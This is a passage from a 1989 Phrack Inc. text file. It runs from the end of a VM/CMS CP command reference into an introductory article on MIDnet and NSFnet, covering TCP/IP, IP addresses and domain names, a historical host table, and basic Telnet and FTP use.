  746. disconnect virtual machines for execution.  This command is executed in the
  747. format:  SEND (CP) userid (text).
  748. Privilege Class:  G
  749. Function Type:  G
  750.  
  751. SET : Use the SET command to control various functions within your virtual
  752. ~~~   system.  This command has a large number of variables that can be SET
  753. and details for each of the variables can be obtained from the HELP CP SET
  754. file.
  755. Privilege Class:  A, B, E, F, G
  756. Function Type:  O, R, A, C, G
  757.  
  758. SHUTDOWN : This command, of course, systematically ends all virtual machine
  759. ~~~~~~~~   functions and checkpoints the system for an eventual warn start.
  760. Privilege Class:  A
  761. Function Type:  O
  762.  
  763. SLEEP or SL : To place the virtual machine in a dormant state but allow
  764. ~~~~~~~~~~~   messages to be displayed, use the SLEEP command in the format
  765. of SLEEP nn (time-specification) where time-specification is SEC for seconds,
  766. MIN for minutes, or HR for hours and nn is the number of the amount of time
  767. for the machine to be in dormant state.
  768. Privilege Class:  G
  769. Function Type:  G
  770.  
  771. SMSG or SM : The SMSG command is used to send a special message to a virtual
  772. ~~~~~~~~~~   machine programmed to accept and process the message.  The format
  773. of this command is SMSG userid msgtext where userid is the userid to receive
  774. the message and msgtext is the message to be sent to the userid.
  775. Privilege Class:  G
  776. Function Type:  G
  777.  
  778. SPACE : Use the SPACE command to force the output on a specified printer to be
  779. ~~~~~   single spaced for the current active spool file regardless of the
  780. carriage control commands in the actual file.
  781. Privilege Class:  D
  782. Function Type:  S
  783.  
  784. SPMODE : SPMODE allows the system operator to establish or reset the single
  785. ~~~~~~   processor mode environment.
  786. Privilege Class:  A
  787. Function Type:  O
  788.  
  789. SPOOL or SP : Use the SPOOL command to modify the spooling control options in
  790. ~~~~~~~~~~~   effect for a given virtual spooling device or for a group of
  791. devices.  The SPOOL command can also start or stop the spooling of virtual
  792. console input and output.  You can direct a file to a remote location by using
  793. the SPOOL command in conjunction with the TAG command.
  794. Privilege Class:  G
  795. Function Type:  G
  796.  
  797. SPTAPE : Use this command to dump spool files to tape or to load spool files
  798. ~~~~~~   from tape.
  799. Privilege Class:  D
  800. Function Type:  S
  801.  
  802. START : The START command restarts a spooling device after it has been drained
  803. ~~~~~   or changes the output class that it may service.
  804. Privilege Class:  D
  805. Function Type:  S
  806.  
  807. STCP : To alter the contents of real storage but not real PSW or real
  808. ~~~~   registers, use the STCP command.
  809. Privilege Class:  C
  810. Function Type:  P
  811.  
  812. STORE or ST : The STORE command is used to alter the contents of specified
  813. ~~~~~~~~~~~   registers and locations of the virtual machine.  As well as
  814. saving virtual machine data in low storage, the contents of the following can
  815. be altered:
  816.  
  817.   o  Virtual storage locations
  818.   o  General registers
  819.   o  Floating-point registers
  820.   o  Control registers
  821.   o  Program Status Word (PSW)
  822. Privilege Class:  G
  823. Function Type:  G
  824.  
  825. SYSTEM or SYS : SYSTEM is used to simulate the action of the RESET and RESTART
  826. ~~~~~~~~~~~~~   buttons on the real computer console, and to clear storage.
  827. The variables are as follows:
  828.  
  829.   o  CLEAR : clears virtual storage and virtual storage keys to binary zeros.
  830.   o  RESET : clears all pending interrupts and conditions in the virtual
  831.              machine.
  832.   o  RESTART : simulates the hardware system RESTART function by storing the
  833.                current PSW at virtual location eight and loading, as the new
  834.                PSW, the doubleword from virtual location zero.
  835. Privilege Class:  G
  836. Function Type:  G
  837.  
  838. TAG or TA : The TAG has many different variables that can be tagged, which are
  839. ~~~~~~~~~   too many to list here because of different settings for each one,
  840. but it is used to associate file descriptive information with a spool file.
  841. Privilege Class:  G
  842. Function Type:  G
  843.  
  844. TERMINAL or TERM : The TERMINAL command is used to control the following
  845. ~~~~~~~~~~~~~~~~   functions associated with your virtual console:
  846.  
  847.   o  Logical line-editing symbols
  848.   o  Masking of password
  849.   o  The APL character set
  850.   o  The Text character set
  851.   o  Signaling of an attention interrupt
  852.   o  Attention handling mode for your virtual console
  853.   o  Line length for output on your virtual console
  854.   o  Specifying terminal device type as 3101 or TTY
  855.   o  Location of cursor preceding terminal read
  856.   o  Scrolling rate for 3101 terminal
  857. Privilege Class:  G
  858. Function Type:  G
  859.  
  860. TRACE or TR : Use the TRACE command to trace specified virtual machine
  861. ~~~~~~~~~~~   activity and to record the results at the terminal, on a virtual
  862. spooled printer, or on both terminal and printer.  If you issue more than one
  863. TRACE command, the operands are cumulative; that is, operands specified for the
  864. first time are activated, whereas those specified with new modifiers are
  865. updated.  The RUN and NORUN operands, however, can be specified in different
  866. tracing functions and do not cause a conflict.
  867.  
  868. You cannot issue the TRACE command while preferred machine assist is
  869. operating, whether or not you have enabled the preferred machine assist
  870. feature's control switch assist.
  871. Privilege Class:  G
  872. Function Type:  G
  873.  
  874. TRANSFER or TRAN : This command is used to transfer your closed spool files to
  875. ~~~~~~~~~~~~~~~~   a specified user or queue, or to reclaim closed spool files
  876. that you created.
  877. Privilege Class:  D, G
  878. Function Type:  S, G
  879.  
  880. UNLOCK : Use the UNLOCK command to unlock page frames previously locked by a
  881. ~~~~~~   LOCK command.
  882. Privilege Class:  A
  883. Function Type:  O
  884.  
  885. VARY : The VARY command marks a device available or unavailable for use by a
  886. ~~~~   user or the control program.
  887. Privilege Class:  B
  888. Function Type:  R
  889.  
  890. VMDUMP or VMD : The VMDUMP command dumps virtual storage that VM/SP HPO
  891. ~~~~~~~~~~~~~   creates for the virtual machine user.  VMDUMP dumps the
  892. following:
  893.  
  894.   o  Virtual Program Status Word (PSW)
  895.   o  General registers
  896.   o  Floating-point registers
  897.   o  Control registers
  898.   o  Storage protection keys
  899.   o  Virtual machine type identification
  900.   o  Timer values
  901. Privilege Class:  G
  902. Function Type:  G
  903.  
  904. WARNING : Use the WARNING command to transmit high-priority messages to a
  905. ~~~~~~~   specified user or to all users.
  906. Privilege Class:  A, B
  907. Function Type:  O
  908.  
  909. ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
  910. This article is far from totally complete as far as in-depthness goes.  As I
  911. have stated in numerous portions of this file, the VM/CMS system has a very
  912. good HELP file system, and from CMS, the command HELP CP <command> will, in
  913. most cases, allow you to read a relatively clear text file containing the
  914. details and usage specifications of these commands.  I hope that, should you be
  915. moving around a VM/CMS system, this file will assist you in the CP mode.
  916.  
  917. For those that wish to contact me for commentary on this file topic or other
  918. topic conversation, you can send e-mail to my network addresses:
  919.  
  920.                     Internet:  C488869@UMCVMB.MISSOURI.EDU
  921.                       Bitnet:  C488869@UMCVMB.BITNET
  922.  
  923. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  924.  
  925.                                 ==Phrack Inc.==
  926.  
  927.                      Volume Three, Issue 27, File 3 of 12
  928.  
  929.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  930.        <>                                                            <>
  931.        <>                   Introduction to MIDNET                   <>
  932.        <>                   ~~~~~~~~~~~~~~~~~~~~~~                   <>
  933.        <>        Chapter Seven Of The Future Transcendent Saga       <>
  934.        <>                                                            <>
  935.        <>               A More Indepth Look Into NSFnet              <>
  936.        <>             National Science Foundation Network            <>
  937.        <>                                                            <>
  938.        <>                Presented by Knight Lightning               <>
  939.        <>                        June 16, 1989                       <>
  940.        <>                                                            <>
  941.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  942.  
  943.  
  944. Prologue
  945. ~~~~~~~~
  946. If you are not already familiar with NSFnet, I would suggest that you read:
  947.  
  948. "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely;
  949. "NSFnet:  National Science Foundation Network" (Phrack Inc., Volume Three,
  950.                                                 Issue 26, File 4 of 11).
  951.  
  952.  
  953. Table Of Contents
  954. ~~~~~~~~~~~~~~~~~
  955. *  Introduction
  956. *  The DOD Protocol Suite
  957. *  Names and Addresses In A Network
  958. *  Telnet (*NOT* Telenet)
  959. *  File Transfer
  960. *  Mail
  961.  
  962.  
  963. Introduction
  964. ~~~~~~~~~~~~
  965. MIDNET is a regional computer network that is part of the NSFnet, the National
  966. Science Foundation Network.  Currently, eleven mid-United States universities
  967. are connected to each other and to the NSFnet via MIDnet:
  968.  
  969. UA  - University of Arkansas at Fayetteville
  970. ISU - Iowa State University at Ames
  971. UI  - University of Iowa at Iowa City
  972. KSU - Kansas State University at Manhattan
  973. KU  - University of Kansas at Lawrence
  974. UMC - University of Missouri at Columbia
  975. WU  - Washington University at St. Louis, Missouri
  976. UNL - University of Nebraska at Lincoln
  977. OSU - Oklahoma State University at Stillwater
  978. UT  - University of Tulsa (Oklahoma)
  979. OU  - University of Oklahoma at Norman
  980.  
  981. Researchers at any of these universities that have funded grants can access the
  982. six supercomputer centers funded by the NSF:
  983.  
  984. John Von Neuman Supercomputer Center
  985. National Center for Atmospheric Research
  986. Cornell National Supercomputer Facility
  987. National Center for Supercomputing Applications
  988. Pittsburgh Supercomputing Center
  989. San Diego Supercomputing Center
  990.  
  991. In addition, researchers and scientists can communicate with each other over a
  992. vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,
  993. BITnet, and others that you have read about in The Future Transcendent Saga.
  994. Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13)
  995. for more details.
  996.  
  997. MIDnet is just one of several regional computer networks that comprise the
  998. NSFnet system.  Although all of these regional computer networks work the same,
  999. MIDnet is the only one that I have direct access to and so this file is written
  1000. from a MIDnet point of view.  For people who have access to the other regional
  1001. networks of NSFnet, the only real differences depicted in this file that would
  1002. not apply to the other regional networks are the universities that are served
  1003. by MIDnet as opposed to:
  1004.  
  1005. NYSERnet  in New York State
  1006. SURAnet   in the southeastern United States
  1007. SEQSUInet in Texas
  1008. BARRnet   in the San Francisco area
  1009. MERIT     in Michigan
  1010.  
  1011.            (There are others that are currently being constructed.)
  1012.  
  1013. These regional networks all hook into the NSFnet backbone, which is a network
  1014. that connects the six supercomputer centers.  For example, a person at Kansas
  1015. State University can connect with a supercomputer via MIDnet and the NSFnet
  1016. backbone.  That researcher can also send mail to colleagues at the University
  1017. of Delaware by using MIDnet, NSFnet and SURAnet.  Each university has its own
  1018. local computer network which connects on-campus computers as well as providing
  1019. a means to connecting to a regional network.
  1020.  
  1021. Some universities are already connected to older networks such as CSnet, the
  1022. ARPAnet and BITnet.  In principal, any campus connected to any of these
  1023. networks can access anyone else in any other network since there are gateways
  1024. between the networks.
  1025.  
  1026. Gateways are specialized computers that forward network traffic, thereby
  1027. connecting networks.  In practice, these wide-area networks use different
  1028. networking technology which make it impossible to provide full functionality
  1029. across the gateways.  However, mail is almost universally supported across all
  1030. gateways, so that a person at a BITnet site can send mail messages to a
  1031. colleague at an ARPAnet site (or anywhere else for that matter).  You should
  1032. already be somewhat familiar with this, but if not refer to;
  1033.  
  1034. "Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and
  1035. "Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11)
  1036.  
  1037. Computer networks rely on hardware and software that allow computers to
  1038. communicate.  The language that enables network communication is called a
  1039. protocol.  There are many different protocols in use today.  MIDnet uses the
  1040. TCP/IP protocols, also known as the DOD (Department of Defense) Protocol Suite.
  1041.  
  1042. Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet.  In fact,
  1043. all the regional networks that are linked to the NSFnet backbone are required
  1044. to use TCP/IP.  At the local campus level, TCP/IP is often used, although other
  1045. protocols such as IBM's SNA and DEC's DECnet are common.  In order to
  1046. communicate with a computer via  MIDnet and the NSFnet, a computer at a campus
  1047. must use TCP/IP directly or use a gateway that will translate its protocols
  1048. into TCP/IP.
  1049.  
  1050. The Internet is a world-wide computer network that is the conglomeration of
  1051. most of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the
  1052. regionals, such as MIDnet.  To a lesser degree, other networks such as BITnet
  1053. that can send mail to hosts on these networks are included as part of the
  1054. Internet.  This huge network of networks, the Internet, as you have by now read
  1055. all about in the pages of Phrack Inc., is a rapidly growing and very complex
  1056. entity that allows sophisticated communication between scientists, students,
  1057. government officials and others.  Being a part of this community is both
  1058. exciting and challenging.
  1059.  
  1060. This chapter of the Future Transcendent Saga gives a general description of the
  1061. protocols and software used in MIDnet and the NSFNet.  A discussion of several
  1062. of the more commonly used networking tools is also included to enable you to
  1063. make practical use of the network as soon as possible.
  1064.  
  1065.  
  1066. The DOD Protocol Suite
  1067. ~~~~~~~~~~~~~~~~~~~~~~
  1068. The DOD Protocol Suite includes many different protocols.  Each protocol is a
  1069. specification of how communication is to occur between computers.  Computer
  1070. hardware and software vendors use the protocol to create programs and sometimes
  1071. specialized hardware in order to implement the network function intended by the
  1072. protocol.  Different implementations of the same protocol exist for the varied
  1073. hardware and operating systems found in a network.
  1074.  
  1075. The three most commonly used network functions are:
  1076.  
  1077. Mail          -- Sending and receiving messages
  1078. File Transfer -- Sending and receiving files
  1079. Remote Login  -- Logging into a distant computer
  1080.  
  1081. Of these, mail is probably the most commonly used.
  1082.  
  1083. In the TCP/IP world, there are three different protocols that realize these
  1084. functions:
  1085.  
  1086. SMTP   -- (Simple Mail Transfer Protocol) Mail
  1087. FTP    -- (File Transfer Protocol) sending and receiving files
  1088. Telnet -- Remote login
  1089.  
  1090. How to use these protocols is discussed in the next section.  At first glance,
  1091. it is not obvious why these three functions are the most common.  After all,
  1092. mail and file transfer seem to be the same thing.  However, mail messages are
  1093. not identical to files, since they are usually comprised of only ASCII
  1094. characters and are sequential in structure.  Files may contain binary data and
  1095. have complicated, non-sequential structures.  Also, mail messages can usually
  1096. tolerate some errors in transmission whereas files should not contain any
  1097. errors.  Finally, file transfers usually occur in a secure setting (i.e. The
  1098. users who are transferring files know each other's names and passwords and are
  1099. permitted to transfer the file, whereas mail can be sent to anybody as long as
  1100. their name is known).
  1101.  
  1102. While mail and transfer accomplish the transfer of raw information from one
  1103. computer to another, Telnet allows a distant user to process that information,
  1104. either by logging in to a remote computer or by linking to another terminal.
  1105. Telnet is most often used to remotely log in to a distant computer, but it is
  1106. actually a general-purpose communications protocol.  I have found it incredibly
  1107. useful over the last year.  In some ways, it could be used for a great deal of
  1108. access because you can directly connect to another computer anywhere that has
  1109. TCP/IP capabilities, however please note that Telnet is *NOT* Telenet.
  1110.  
  1111. There are other functions that some networks provide, including the following:
  1112.  
  1113. - Name to address translation for networks, computers and people
  1114. - The current time
  1115. - Quote of the day or fortune
  1116. - Printing on a remote printer, or use of any other remote peripheral
  1117. - Submission of batch jobs for non-interactive execution
  1118. - Dialogues and conferencing between multiple users
  1119. - Remote procedure call (i.e. Distributing program execution over several
  1120.                               remote computers)
  1121. - Transmission of voice or video information
  1122.  
  1123. Some of these functions are still in the experimental stages and require faster
  1124. computer networks than currently exist.  In the future, new functions will
  1125. undoubtedly be invented and existing ones improved.
  1126.  
  1127. The DOD Protocol Suite is a layered network architecture, which means that
  1128. network functions are performed by different programs that work independently
  1129. and in harmony with each other.  Not only are there different programs but
  1130. there are different protocols.  The protocols SMTP, FTP and Telnet are
  1131. described above.  Protocols have been defined for getting the current time, the
  1132. quote of the day, and for translating names.  These protocols are called
  1133. applications protocols because users directly interact with the programs that
  1134. implement these protocols.
  1135.  
  1136. The Transmission Control Protocol, TCP, is used by many of the application
  1137. protocols.  Users almost never interact with TCP directly.  TCP establishes a
  1138. reliable end-to-end connection between two processes on remote computers.  Data
  1139. is sent through a network in small chunks called packets to improve reliability
  1140. and performance.  TCP ensures that packets arrive in order and without errors.
  1141. If a packet does have errors, TCP requests that the packet be retransmitted.
  1142.  
  1143. In turn, TCP calls upon IP, Internet Protocol, to move the data from one
  1144. network to another.  IP is still not the lowest layer of the architecture,
  1145. since there is usually a "data link layer protocol" below it.  This can be any
  1146. of a number of different protocols, two very common ones being X.25 and
  1147. Ethernet.
  1148.  
  1149. FTP, Telnet and SMTP are called "application protocols", since they are
  1150. directly used by applications programs that enable users to make use of the
  1151. network.  Network applications are the actual programs that implement these
  1152. protocols and provide an interface between the user and the computer.  An
  1153. implementation of a network protocol is a program or package of programs that
  1154. provides the desired network function such as file transfer.  Since computers
  1155. differ from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its
  1156. own implementation of these protocols.  However, the protocols are standardized
  1157. so that computers can interoperate over the network (i.e. Can understand and
  1158. process each other's data).  For example, a TCP packet generated by an IBM
  1159. computer can be read and processed by a DEC computer.
  1160.  
  1161. In many instances, network applications programs use the name of the protocol.
  1162. For example, the program that transfers files may be called "FTP" and the
  1163. program that allows remote logins may be called "Telnet."  Sometimes these
  1164. protocols are incorporated into larger packages, as is common with SMTP.  Many
  1165. computers have mail programs that allow users on the same computer to send mail
  1166. to each other.  SMTP functions are often added to these mail programs so that
  1167. users can also send and receive mail through a network.  In such cases, there
  1168. is no separate program called SMTP that the user can access, since the mail
  1169. program provides the user interface to this network function.
  1170.  
  1171. Specific implementation of network protocols, such as FTP, are tailored to the
  1172. computer hardware and operating system on which they are used.  Therefore, the
  1173. exact user interface varies from one implementation to another.  For example,
  1174. the FTP protocol specifies a set of FTP commands which each FTP implementation
  1175. must understand and process.  However, these are usually placed at a low level,
  1176. often invisible to the user, who is given a higher set of commands to use.
  1177.  
  1178. These higher-level commands are not standardized so they may vary from one
  1179. implementation of FTP to another.  For some operating systems, not all of these
  1180. commands make equal sense, such as "Change Directory," or may have different
  1181. meanings.  Therefore the specific user interface that the user sees will
  1182. probably differ.
  1183.  
  1184. This file describes a generic implementation of the standard TCP/IP application
  1185. protocols.  Users must consult local documentation for specifics at their
  1186. sites.
  1187.  
  1188.  
  1189. Names and Addresses In A Network
  1190. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1191. In DOD Protocol Suite, each network is given a unique identifying number.  This
  1192. number is assigned by a central authority, namely the Network Information
  1193. Center run by SRI, abbreviated as SRI-NIC, in order to prevent more than one
  1194. network from having the same network number.  For example, the ARPAnet has
  1195. network number 10 while MIDnet has a longer number, namely 128.242.
  1196.  
  1197. Each host in a network has a unique identification so other hosts can specify
  1198. them unambiguously.  Host numbers are usually assigned by the organization that
  1199. manages the network, rather than one central authority.  Host numbers do not
  1200. need to be unique throughout the whole Internet but two hosts on the same
  1201. network need to have unique host numbers.
  1202.  
  1203. The combination of the network number and the host number is called the IP
  1204. address of the host and is specified as a 32-bit binary number.  All IP
  1205. addresses in the Internet are expressible as 32-bit numbers, although they are
  1206. often written in dotted decimal notation.  Dotted decimal notation breaks the
  1207. 32-bit number into four eight-bit parts or octets and each octet is specified
  1208. as a decimal number.  For example, 00000001 is the binary octet that specifies
  1209. the decimal number 1, while 11000000 specifies 192.  Dotted decimal notation
  1210. makes IP addresses much easier to read and remember.
  1211.  
  1212. Computers in the Internet are also identified by hostnames, which are strings
  1213. of characters, such as "phrackvax."  However, IP packets must specify the
  1214. 32-bit IP address instead of the hostname so  some way to translating hostnames
  1215. to IP addresses must exist.
  1216.  
  1217. One way is to have a table of hostnames and their corresponding IP addresses,
  1218. called a hosttable.  Nearly every TCP/IP implementation has such a hosttable,
  1219. although the weaknesses of this method are forcing a shift to a new scheme
  1220. called the domain name system.  In UNIX systems, the hosttable is often called
  1221. "/etc/hosts."  You can usually read this file and find out what the IP
  1222. addresses of various hosts are.  Other systems may call this file by a
  1223. different name and make it unavailable for public viewing.
  1224.  
  1225. Users of computers are generally given accounts to which all charges for
  1226. computer use are billed.  Even if computer time is free at an installation,
  1227. accounts are used to distinguish between the users and enforce file
  1228. protections.  The generic term "username" will be used in this file to refer to
  1229. the name by which the computer account is accessed.
  1230.  
  1231. In the early days of the ARPAnet which was the first network to use the TCP/IP
  1232. protocols, computer users were identified by their username, followed by a
  1233. commercial "at" sign (@), followed by the hostname on which the account
  1234. existed.  Networks were not given names, per se, although the IP address
  1235. specified a network number.
  1236.  
  1237. For example, "knight@phrackvax" referred to user "knight" on host "phrackvax."
  1238. This did not specify which network "phrackvax" was on, although that
  1239. information could be obtained by examining the hosttable and the IP address for
  1240. "phrackvax."  (However, "phrackvax" is a ficticious hostname used for this
  1241. presentation.)
  1242.  
  1243. As time went on, every computer on the network had to have an entry in its
  1244. hosttable for every other computer on the network.  When several networks
  1245. linked together to form the Internet, the problem of maintaining this central
  1246. hosttable got out of hand.  Therefore, the domain name scheme was introduced to
  1247. split up the hosttable and make it smaller and easier to maintain.
  1248.  
  1249. In the new domain name scheme, users are still identified by their usernames,
  1250. but hosts are now identified by their hostname and any and all domains of which
  1251. they are a part.  For example, the following address,
  1252. "KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB".
  1253. However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn
  1254. part of the domain "EDU".  There are other domains in "EDU", although only one
  1255. is named "MISSOURI".  In the domain "MISSOURI", there is only one host named
  1256. "UMCVMB".
  1257.  
  1258. However, other domains in "EDU" could theoretically have hosts named "UMCVMB"
  1259. (although I would say that this is rather unlikely in this example).  Thus the
  1260. combination of hostname and all its domains makes it unique.  The method of
  1261. translating such names into IP addresses is no longer as straightforward as
  1262. looking up the hostname in a table.  Several protocols and specialized network
  1263. software called nameservers and resolvers implement the domain name scheme.
  1264.  
  1265. Not all TCP/IP implementations support domain names because it is rather new.
  1266. In those cases, the local hosttable provides the only way to translate
  1267. hostnames to IP addresses.  The system manager of that computer will have to
  1268. put an entry into the hosttable for every host that users may want to connect
  1269. to.  In some cases, users may consult the nameserver themselves to find out the
  1270. IP address for a given hostname and then use that IP address directly instead
  1271. of a hostname.
  1272.  
  1273. I have selected a few network hosts to demonstrate how a host system can be
  1274. specified by both the hostname and host numerical address.  Some of the nodes I
  1275. have selected are also nodes on BITnet, perhaps even some of the others that I
  1276. do not make a note of due a lack of omniscent awareness about each and every
  1277. single host system in the world :-)
  1278.  
  1279. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1280. Numerical      Hostname                   Location                       BITnet
  1281. ---------      --------                   --------                       ------
  1282. 18.72.0.39     ATHENA.MIT.EDU             (Mass. Institute of Technology)     ?
  1283. 26.0.0.73      SRI-NIC.ARPA               (DDN Network Information Center)    -
  1284. 36.21.0.13     MACBETH.STANFORD.EDU       (Stanford University)               ?
  1285. 36.21.0.60     PORTIA.STANFORD.EDU        (Stanford University)               ?
  1286. 128.2.11.131   ANDREW.CMU.EDU             (Carnegie Mellon University)   ANDREW
  1287. 128.3.254.13   LBL.GOV                    (Lawrence Berkeley Labrotories)   LBL
  1288. 128.6.4.7      RUTGERS.RUTGERS.EDU        (Rutgers University)                ?
  1289. 128.59.99.1    CUCARD.MED.COLUMBIA.EDU    (Columbia University)               ?
  1290. 128.102.18.3   AMES.ARC.NASA.GOV          (Ames Research Center [NASA])       -
  1291. 128.103.1.1    HARVARD.EDU                (Harvard University)          HARVARD
  1292. 128.111.24.40  HUB.UCSB.EDU               (Univ. Of Calif-Santa Barbara)      ?
  1293. 128.115.14.1   LLL-WINKEN.LLNL.GOV        (Lawrence Livermore Labratories)    -
  1294. 128.143.2.7    UVAARPA.VIRGINIA.EDU       (University of Virginia)            ?
  1295. 128.148.128.40 BROWNVM.BROWN.EDU          (Brown University)              BROWN
  1296. 128.163.1.5    UKCC.UKY.EDU               (University of Kentucky)         UKCC
  1297. 128.183.10.4   NSSDCA.GSFC.NASA.GOV       (Goddard Space Flight Center [NASA])-
  1298. 128.186.4.18   RAI.CC.FSU.EDU             (Florida State University)        FSU
  1299. 128.206.1.1    UMCVMB.MISSOURI.EDU        (Univ. of Missouri-Columbia)   UMCVMB
  1300. 128.208.1.15   MAX.ACS.WASHINGTON.EDU     (University of Washington)        MAX
  1301. 128.228.1.2    CUNYVM.CUNY.EDU            (City University of New York)  CUNYVM
  1302. 129.10.1.6     NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University)       NUHUB
  1303. 131.151.1.4    UMRVMA.UMR.EDU             (University of Missouri-Rolla) UMRVMA
  1304. 192.9.9.1      SUN.COM                    (Sun Microsystems, Inc.)            -
  1305. 192.33.18.30   VM1.NODAK.EDU              (North Dakota State Univ.)    NDSUVM1
  1306. 192.33.18.50   PLAINS.NODAK.EDU           (North Dakota State Univ.)    NDSUVAX
  1307.  
  1308. Please Note:  Not every system on BITnet has an IP address.  Likewise, not
  1309.               every system that has an IP address is on BITnet.  Also, while
  1310.               some locations like Stanford University may have nodes on BITnet
  1311.               and have hosts on the IP as well, this does not neccessarily
  1312.               imply that the systems on BITnet and on IP (the EDU domain in
  1313.               this case) are the same systems.
  1314.  
  1315.               Attempts to gain unauthorized access to systems on the Internet
  1316.               are not tolerated and is legally a federal offense.  At some
  1317.               hosts, they take this very seriously, especially the government
  1318.               hosts such as NASA's Goddard Space Flight Center, where they do
  1319.               not mind telling you so at the main prompt when you connect to
  1320.               their system.
  1321.  
  1322.               However, some nodes are public access to an extent.  The DDN
  1323.               Network Information Center can be used by anyone.  The server and
  1324.               database there have proven to be an invaluable source of
  1325.               information when locating people, systems, and other information
  1326.               that is related to the Internet.
  1327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1328. Telnet
  1329.  
  1330. ~~~~~~
  1331. Remote login refers to logging in to a remote computer from a terminal
  1332. connected to a local computer.  Telnet is the standard protocol in the DOD
  1333. Protocol Suite for accomplishing this.  The "rlogin" program, provided with
  1334. Berkeley UNIX systems and some other systems, also enables remote login.
  1335.  
  1336. For purposes of discussion, the "local computer" is the computer to which your
  1337. terminal is directly connected while the "remote computer" is the computer on
  1338. the network to which you are communicating and to which your terminal is *NOT*
  1339. directly connected.
  1340.  
  1341. Since some computers use a different method of attaching terminals to
  1342. computers, a better definition would be the following:  The "local computer" is
  1343. the computer that you are currently using and the "remote computer" is the
  1344. computer on the network with which you are or will be communicating.  Note that
  1345. the terms "host" and "computer" are synonymous in the following discussion.
  1346.  
  1347. To use Telnet, simply enter the command: TELNET
  1348.  
  1349. The prompt that Telnet gives is:  Telnet>
  1350.  
  1351. (However, you can specify where you want to Telnet to immediately and bypass
  1352. the the prompts and other delays by issuing the command:  TELNET [location].)
  1353.  
  1354. There is help available by typing in ?.  This prints a list of all the valid
  1355. subcommands that Telnet provides with a one-line explanation.
  1356.  
  1357. Telnet> ?
  1358.  
  1359. To connect to to another computer, use the open subcommand to open a connection
  1360. to that computer.  For example, to connect to the host "UMCVMB.MISSOURI.EDU",
  1361. do "open umcvmb.missouri.edu"
  1362.  
  1363. Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into an
  1364. IP address and will send a packet to that host requesting login.  If the remote
  1365. host decides to let you attempt a login, it prompts you for your username and
  1366. password.  If the host does not respond, Telnet will "time out" (i.e. Wait for
  1367. a reasonable amount of time such as 20 seconds) and then terminate with a
  1368. message such as "Host not responding."
  1369.  
  1370. If your computer does not have an entry for a remote host in its hosttable and
  1371. it cannot resolve the name, you can use the IP address explicitly in the telnet
  1372. command.  For example,
  1373.  
  1374. TELNET 26.0.0.73 (Note:  This is the IP address for the DDN Network Information
  1375.                  Center [SRI-NIC.ARPA])
  1376.  
  1377. If you are successful in logging in, your terminal is connected to the remote
  1378. host.  For all intents and purposes, your terminal is directly hard-wired to
  1379. that host and you should be able to do anything on your remote terminal that
  1380. you can do at any local terminal.  There are a few exceptions to this rule,
  1381. however.
  1382.  
  1383. Telnet provides a network escape character, such as CONTROL-T. You can find out
  1384. what the escape character is by entering the "status" subcommand:
  1385.  
  1386. Telnet> status
  1387.  
  1388. You can change the escape character by entering the "escape" subcommand:
  1389.  
  1390. Telnet> escape
  1391.  
  1392. When you type in the escape character, the Telnet prompt returns to your screen
  1393. and you can enter subcommands.  For example, to break the connection, which
  1394. usually logs you off the remote host, enter the subcommand "quit":
  1395.  
  1396. Telnet> quit
  1397.  
  1398. Your Telnet connection usually breaks when you log off the remote host, so the
  1399. "quit" subcommand is not usually used to log off.
  1400.  
  1401. When you are logged in to a remote computer via Telnet, remember that there is
  1402. a time delay between your local computer and the remote one.  This often
  1403. becomes apparent to users when scrolling a long file across the terminal screen
  1404. nd they wish to cancel the scrolling by typing CONTROL-C or something similar.
  1405. After typing the special control character, the scrolling continues.  The
  1406. special control character takes a certain amount of time to reach the remote
  1407. computer which is still scrolling information.  Thus response from the remote
  1408. computer will not likely be as quick as response from a local computer.
  1409.  
  1410. Once you are remotely logged on, the computer you are logged on to effectively
  1411. becomes your "local computer," even though your original "local computer" still
  1412. considers you logged on.  You can log on to a third computer which would then
  1413. become your "local computer" and so on.  As you log out of each session, your
  1414. previous session becomes active again.
  1415.  
  1416.  
  1417. File Transfer
  1418. ~~~~~~~~~~~~~
  1419.  
  1420. FTP is the program that allows files to be sent from one computer to another.
  1421. "FTP" stands for "File Transfer Protocol".
  1422.  
  1423. When you start using FTP, a communications channel with another computer on the
  1424. network is opened.  For example, to start using FTP and initiate a file
  1425. transfer session with a computer on the network called "UMCVMB", you would
  1426. issue the following subcommand:
  1427.  
  1428. FTP UMCVMB.MISSOURI.EDU
  1429.  
  1430. Host "UMCVMB" will prompt you for an account name and password.  If your login
  1431. is correct, FTP will tell you so, otherwise it will say "login incorrect."  Try
  1432. again or abort the FTP program.  (This is usually done by typing a special
  1433. control character such as CONTROL-C.  The "program abort" character varies from
  1434. system to system.)
  1435.  
  1436. Next you will see the FTP prompt, which is:
  1437.  
  1438. Ftp>
  1439.  
  1440. There are a number of subcommands of FTP.  The subcommand "?" will list these
  1441. commands and a brief description of each one.
  1442.  
  1443. You can initiate a file transfer in either direction with FTP, either from the
  1444. remote host or to the remote host.  The "get" subcommand initiates a file
  1445. transfer from the remote host (i.e. Tells the remote computer to send the file
  1446. to the local computer [the one on which you issued the "ftp" command]).  Simply
  1447. enter "get" and  FTP will prompt you for the remote host's file name and the
